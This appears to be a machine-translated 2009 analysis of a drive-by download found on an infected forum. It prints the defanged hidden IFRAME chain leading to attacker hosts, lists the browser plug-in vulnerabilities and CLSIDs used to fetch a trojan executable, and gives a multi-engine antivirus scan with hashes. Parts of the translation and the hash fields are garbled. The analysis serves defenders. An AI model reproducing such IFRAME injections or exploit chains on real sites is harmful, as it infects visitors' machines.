A forum is infected with worm. win32.autorun. eyh
The forum page contains code:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js'> </iframe>
---/
Hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js
Output code:
/---
<IFRAME src = "hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm" width = 1 Height = 0> </iframe>
Hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm
Code included:
/---
<IFRAME src=google.htm width = 100 Height = 0> </iframe>
---/
Hxxp: // M **. SF * S3 ** wws.cn/03/google.htm
A previously unknown encryption method is used. The first part of the code is:
/---
<HTML> ---/
Its function is to check the browser software. If it is an Internet browser, ie.swf is displayed, and ff.swf is displayed if it is negative. Then, the code is output:
/---
<IFRAME src1_all.htm width = 100 Height = 0> </iframe>
---/
Hxxp: // M **. SF * S3 ** wws.cn/03/all.htm
The same encryption method is used:
Use <IFRAME> to introduce the following web pages and use the vulnerability to download hxxp: // d1.csygg.com/01/g.exe:
1. htm
Exploiting MS-06014 Vulnerabilities
Kdosn.htm
Leverage the qvod player (CLSID: F3D0D36F-23F8-4682-A195-74C92B03D4AF) Vulnerability
Kc.htm
Download hxxp: // d1.csygg.com/01/baidu.cab by using the Baidu tool bar (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) Vulnerability
Newlz.htm
Exploiting the lizing (gliedown. iedown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8) Vulnerability
S.htm
Use Sina (Downloader. dloader.1, CLSID: 78abdc59-d8e7-44d3-9a76-9a0918c52b4a) Vulnerability
Office.htm
Using the MS Office (snpvw. Snapshot Viewer control.1) Vulnerability
Bf.htm
Use storm audio and video (MPs. stormplayer,) Vulnerabilities
Cx.htm
Use the superstar scanner (pdg2) Vulnerability
Uu.htm
Uusee network TV (uuupgrade. uuupgradectrl.1) Vulnerability
2. htm
Exploiting the hangameplugincn18.hangameplugincn18.1 Vulnerability
3. htm
4. htm
Use RealPlayer (ierpctl. ierpctl.1) Vulnerability
0. htm
Exploitation (CLSID: 19effc12-25fb-479a-a0f2-1569ae1b3365) Vulnerability
5. htm
Exploiting MS09-002 Vulnerabilities
File Description: D:/test/g.exe
Attribute: ---
Digital Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Creation Time: 22:38:20
Modification time: 22:38:20
Size: 25696 bytes, 25.96 KB
MD5: cae3e537b9d4495d31af6c360cb31dee
Sha1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
CRC32: 3ee9304b
Anti-Virus engine |
Version |
Last update |
Scan results |
A-squared |
4.0.0.101 |
2009.03.23 |
Win32.warezov! Ik |
AhnLab-V3 |
5.0.0.2 |
2009.03.23 |
Packed/upack |
AntiVir |
7.9.0.120 |
2009.03.23 |
TR/crypt. upkm. gen |
Authentium |
5.1.2.4 |
2009.03.23 |
W32/systroj. N. Gen! Eldorado |
Avast |
4.8.1335.0 |
2009.03.23 |
- |
AVG |
8.5.0.283 |
2009.03.23 |
Rootkit-Agent.BN |
BitDefender |
7.2 |
2009.03.23 |
Generic. malware. SP! BPK! TKG. be60b47d |
Cat-quickheal |
10.00 |
2009.03.23 |
- |
ClamAV |
0.94.1 |
2009.03.23 |
Worm. Mytob-73 |
Comodo |
1082 |
2009.03.23 |
- |
Drweb |
4.44.0.09170 |
2009.03.23 |
Dloader. Trojan |
Esafe |
7.0.20. |
2009.03.23 |
Win32.looked. gen |
ETrust-vet |
31.6.6412 |
2009.03.23 |
- |
F-Prot |
4.4.4.56 |
2009.03.23 |
W32/systroj. N. Gen! Eldorado |
F-Secure |
8.0.14470.0 |
2009.03.23 |
Trojan. win32.agent2. gcy |
Fortinet |
3.117.0.0 |
2009.03.23 |
- |
Gdata |
19 |
2009.03.23 |
Generic. malware. SP! BPK! TKG. be60b47d |
Ikarus |
T3.1.1.48.0 |
2009.03.23 |
Win32.warezov |
K7antivirus |
7.10.678 |
2009.03.21 |
Generic. Packed. Upack-1 |
Kaspersky |
7.0.0.125 |
2009.03.23 |
Trojan. win32.agent2. gcy |
McAfee |
5561 |
2009.03.22 |
- |
McAfee + Artemis |
5561 |
2009.03.22 |
New malware. f |
McAfee-GW-Edition |
6.7.6 |
2009.03.23 |
Trojan. crypt. upkm. gen |
Microsoft |
1.4502 |
2009.03.23 |
- |
NOD32 |
3953 |
2009.03.21 |
- |
Norman |
6.00.06 |
2009.03.23 |
W32/suspicious_u.gen |
Nprotect |
2009.1.8.0 |
2009.03.23 |
- |
Panda |
10.0.0.10 |
2009.03.22 |
- |
Pctools |
4.4.2.0 |
2009.03.23 |
Packed/upack |
Prevx1 |
V2 |
2009.03.23 |
High risk Worm |
Rising |
21.22.02.00 |
2009.03.23 |
Worm. win32.autorun. eyh |
Sophos |
4.39.0 |
2009.03.23 |
Mal/packer |
Sunbelt |
3.2.1858.2 |
2009.03.22 |
- |
Symantec |
1.4.4.12 |
2009.03.23 |
Trojan. killav |
Thehacker |
6.3.3.4.287 |
2009.03.23 |
- |
TrendMicro |
8.700.0.1004 |
2009.03.23 |
Cryp_upack |
Vba32 |
3.12.10.1 |
2009.03.23 |
- |
ViRobot |
2009.3.23.1660 |
2009.03.23 |
- |
Virusbuster |
4.6.5.0 |
2009.03.22 |
Packed/upack |
|
Additional information |
File Size: 25696 bytes |
Md5...: cae3e537b9d4495d31af6c360cb31dee |
Sha1..: 76877278ef76318e4a025adc9b9fec8cf8c7d30c |
Sha256: sha256 |
Sha512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca54259bb970550 <br> then |
Ssdeep: 384: b5jocon1ffccinu9mg1_hy + qvmf6mfjt6unhqjnx8cw02igc8telalvr7l: B <br> 4co7ykjvxfjc7n2igptelavr <br> |
Peid ..: upack 0.24-0.27 beta/0.28 alpha-& gt; Dwing |
TRID ..: file type identification <br> dos executable generic (100.0%) |
Peinfo: PE Structure Information <br> (base data) <br> entrypointaddress.: 0x1efe3 <br> timedatestamp .....: 0x0 (Thu Jan 01 00:00:00 1970) <br> machinetype .......: 0x14c (i386) <br> (2 sections) <br> name viradd virsiz rawdsiz ntrpy MD5 <br>. upack 0x1000 0x18000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e <br>. rsrc 0x19000 0xe000 0x6260 7.98 88e69c0ef43413739c008ef9e7337308 <br> (1 Imports) <br> & gt; kernel32.dll: loadlibrarya, getprocaddress <br> (0 exports) <br> |
Prevx info: & lt; a href = 'HTTP: // info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 'target = '_ blank' & gt; http://info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 & lt;/A & gt; |
Packers (Kaspersky): upack |
Packers (authentium): embedded |
Packers (F-Prot): embedded |